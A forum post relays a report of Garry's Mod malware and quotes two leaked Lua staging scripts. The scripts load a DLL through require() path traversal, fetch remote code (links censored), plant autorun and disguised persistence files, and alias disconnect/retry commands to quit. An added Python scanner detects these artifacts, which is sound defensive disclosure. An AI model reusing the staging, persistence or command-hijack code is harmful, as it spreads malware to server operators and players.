pokenow123
Medic
Joined: Dec 30, 2012 | Messages: 13 | Reaction score: 4
The following is from Facepunch:
10 minutes ago a friend contacted me about his Steam being spammed with messages like "fix it vinh" to all of his Steam friends after joining a server. (Here's the chatlog: http://puu.sh/8ej4h.txt)
When bringing it up to Dingusnin he told me that there was a thread made about this 5 minutes ago, but after I had a look at it, it got deleted because it contained the code to spread the virus. We managed to save the virus code, but we can't spread it right here since the thread would get deleted again.
Here is a censored version of the original post.
Some of our clients, and our server, recently got messed with by Chrisaster, or one of his buddies who goes under the same name, or VIN; these include the files client_infect.lua and server_infect.lua.
Seems they do this through client uploads.
Not 100% sure, but it seems they hack into RCON (they can get your RCON password through clientside Lua, even with client uploads disabled), put some files on there, then use some other fancy doodads to infect the server and clients more.
Some of their code leaked into our console, so here's what I found; make what you want of it, and keep in mind that these scripts were very recently made, this is a new thing:
Here's the server_infect.lua
-- Loaded over HTTP by Lua through CompileString(...)() via rcon request
Code:
if not system.IsWindows() then
    return -- the native stager is a Win32 DLL, so Windows only
end
if file.Exists("lua/autorun/server/default.lua", "MOD") then
    return -- Already infected
end
-- Poll until the DLL has landed in download/, then load it through a path-traversal require()
timer.Create("infchk", 2, 0, function()
    if file.Exists("download/engine_win32.dll", "MOD") then
        timer.Remove("infchk")
        require("/../../../download/engine")
        -- CreateFile is not a stock Garry's Mod Lua function; the fetched Lua is written
        -- as a server autorun so it survives restarts, then run immediately
        http.Fetch("*ACTUAL LINK TO VIRUS CODE HERE", function(content)
            CreateFile("garrysmod/lua/autorun/server/default.lua", content)
            include("autorun/server/default.lua")
        end, function() end)
    end
end)
Here's the client_infect.lua
-- Loaded over HTTP by Lua through client:SendLua(..)
Code:
if not system.IsWindows() then
    return -- Windows only, as on the server side
end
if file.Exists("bin/game_shader_generic_engine.dll", "MOD") then
    return -- Already infected
end
-- Same poll-for-DLL pattern as server_infect.lua
timer.Create("infchk", 2, 0, function()
    if file.Exists("download/engine_win32.dll", "MOD") then
        timer.Remove("infchk")
        require("/../../../download/engine")
        http.Fetch("SAME HERE", function(content)
            -- Drop a persistence DLL into bin/ and cache the fetched Lua disguised as a texture
            CreateFile("garrysmod/bin/game_shader_generic_engine.dll", GetShaderBinary())
            CreateFile("garrysmod/materials/cooltexture.vtf", content)
            -- Run the fetched Lua; pcall swallows any error so the stager stays silent
            local ret = CompileString( content, "l", false )
            pcall(ret)
            -- Alias every way of leaving the server to "quit" so the player can only exit the game
            timer.Simple(4, function()
                ConCommand("alias disconnect quit\n")
                ConCommand("alias gamemenucommand quit\n")
                ConCommand("alias retry quit\n")
                ConCommand("alias connect quit\n")
                ConCommand("alias map quit\n")
            end)
        end, function() end)
    end
end)
Source: http://facepunch.com/showthread.php?t=1386818
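As an added example, not code from the Facepunch post or from Garry's Mod itself: a small offline scanner a server operator could run over a garrysmod/ directory to check for the artifacts the two scripts above leave behind (download/engine_win32.dll, lua/autorun/server/default.lua, bin/game_shader_generic_engine.dll, materials/cooltexture.vtf) and for the Lua constructs they rely on (require() with "../" traversal, CreateFile() into lua/autorun, the disconnect/retry alias hijack, and http.Fetch paired with CompileString). The demo tree, the sample Lua files and the example.invalid URLs are constructed for this example; the severity weighting in is_suspicious() is this example's own heuristic, not anything from the post.

```python
# Added example, not code from the Facepunch post or from Garry's Mod: an offline
# IOC scanner for a garrysmod/ tree, keyed on the files the quoted
# server_infect.lua / client_infect.lua drop and on the Lua constructs they use.
# The demo tree, sample files and example.invalid URLs are all constructed here.
import os
import re
import tempfile

# Files the quoted scripts create or check for, relative to the garrysmod/ root.
DROPPED_FILES = {
    "download/engine_win32.dll": "native stager loaded via require() path traversal",
    "lua/autorun/server/default.lua": "server persistence (server_infect.lua)",
    "bin/game_shader_generic_engine.dll": "client persistence marker (client_infect.lua)",
    "materials/cooltexture.vtf": "cached second-stage Lua (client_infect.lua)",
}

# (name, severity, pattern). Severity is this example's own judgement: "high"
# hits are malicious on their own; "low" hits are common in benign addons and
# only count when they occur together (remote fetch + dynamic compile).
LUA_SIGNATURES = [
    ("path-traversal require", "high", re.compile(r'require\s*\(\s*["\'][^"\']*\.\./')),
    ("CreateFile into lua/autorun", "high", re.compile(r'CreateFile\s*\(\s*["\'][^"\']*lua/autorun/')),
    ("disconnect/retry alias hijack", "high",
     re.compile(r'alias\s+(?:disconnect|connect|retry|map|gamemenucommand)\s+quit')),
    ("remote fetch (http.Fetch)", "low", re.compile(r'\bhttp\.Fetch\s*\(')),
    ("dynamic compile (CompileString)", "low", re.compile(r'\bCompileString\s*\(')),
]
SEVERITY = {name: sev for name, sev, _ in LUA_SIGNATURES}


def scan_lua_source(text):
    """Names of the signatures that match one Lua source string."""
    return [name for name, _sev, rx in LUA_SIGNATURES if rx.search(text)]


def is_suspicious(matched):
    """One high-severity hit, or two low ones (fetch + compile), is reportable."""
    if any(SEVERITY[m] == "high" for m in matched):
        return True
    return sum(1 for m in matched if SEVERITY[m] == "low") >= 2


def scan_tree(root):
    """Walk a garrysmod/ root; report dropped files and suspicious Lua sources."""
    dropped = sorted(rel for rel in DROPPED_FILES
                     if os.path.isfile(os.path.join(root, *rel.split("/"))))
    suspicious = {}
    for dirpath, _dirs, files in os.walk(root):
        for fn in files:
            full = os.path.join(dirpath, fn)
            rel = os.path.relpath(full, root).replace(os.sep, "/")
            # Lua files, plus the known drop paths (the .vtf holds Lua, not a texture)
            if not (fn.endswith(".lua") or rel in DROPPED_FILES):
                continue
            with open(full, "r", encoding="utf-8", errors="ignore") as fh:
                matched = scan_lua_source(fh.read())
            if matched and is_suspicious(matched):
                suspicious[rel] = matched
    return {"dropped_files": dropped, "suspicious_lua": suspicious}


# Constructed samples mirroring the quoted scripts (placeholder URLs), plus a benign addon.
SERVER_STAGE = r'''require("/../../../download/engine")
http.Fetch("http://example.invalid/payload", function(content)
    CreateFile("garrysmod/lua/autorun/server/default.lua", content)
    include("autorun/server/default.lua")
end, function() end)'''
CLIENT_STAGE = r'''pcall(CompileString(content, "l", false))
ConCommand("alias disconnect quit\n")
ConCommand("alias retry quit\n")'''
BENIGN_ADDON = r'''http.Fetch("http://example.invalid/motd.txt", function(body) print(body) end)'''


def build_demo_tree():
    """Create a throwaway garrysmod/ layout holding infected and benign files."""
    root = tempfile.mkdtemp(prefix="garrysmod_")
    samples = {
        "download/engine_win32.dll": b"MZ\x90\x00 constructed stub, not a real PE",
        "lua/autorun/server/default.lua": SERVER_STAGE.encode(),
        "materials/cooltexture.vtf": CLIENT_STAGE.encode(),
        "lua/autorun/benign.lua": BENIGN_ADDON.encode(),
    }
    for rel, data in samples.items():
        path = os.path.join(root, *rel.split("/"))
        os.makedirs(os.path.dirname(path), exist_ok=True)
        with open(path, "wb") as fh:
            fh.write(data)
    return root


if __name__ == "__main__":
    report = scan_tree(build_demo_tree())
    for rel in report["dropped_files"]:
        print("dropped file:", rel, "-", DROPPED_FILES[rel])
    for rel, sigs in report["suspicious_lua"].items():
        print("suspicious lua:", rel, "->", ", ".join(sigs))
```

Point scan_tree() at a real garrysmod/ directory instead of build_demo_tree() to use it on a server; a hit on any of the dropped-file paths is the strong signal, while the Lua signatures are there to catch a renamed second stage. The benign addon in the demo only calls http.Fetch, so it is deliberately not reported.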